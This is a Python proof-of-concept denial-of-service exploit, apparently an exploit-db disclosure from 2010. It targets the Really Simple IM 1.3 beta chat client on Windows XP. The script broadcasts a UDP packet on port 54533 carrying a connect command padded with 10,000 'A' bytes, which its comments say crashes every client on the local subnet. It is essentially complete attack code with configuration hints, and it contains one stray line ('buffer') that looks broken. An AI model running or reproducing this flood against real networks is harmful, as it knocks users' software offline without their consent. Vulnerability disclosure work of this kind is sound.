#!/usr/bin/python import socket import sys # Bug found: 18th July 2010 # DoS proof of concept # Found by: loneferret # Tested on Windows XP Professional SP2-SP3 & Windows XP Home SP3 # Really Simple IM verion 1.3 beta # Software: http://code.google.com/p/reallysimpleim/ # Nods to exploit-db # I don't want this on injector <- notice the no leet talk. # This little application uses UDP to & send receive messages. # It broadcasts everything, and picks up everything # on port 54533. # The funny thing with this PoC, it will crash all clients # in the same subnet. Yup it's that funny. That's the only thing it does too... # No EIP, no SEH but the buffer is still in memory at the # moment of the crash. Figured I'd share anyway. #Commands # 'p' Connect and adds users to list # 'a' Disconnect message # 'b' Send message # 't' Direct message host = '192.168.xxx.255' #Adjust broadcast address to your network port = 54533 buffer try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.bind((host,0)) s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) except: print "socket() failed" sys.exit(1) da = "p" da += "W00T" + ("\x41" * 10000) s.sendto(da, (host, port))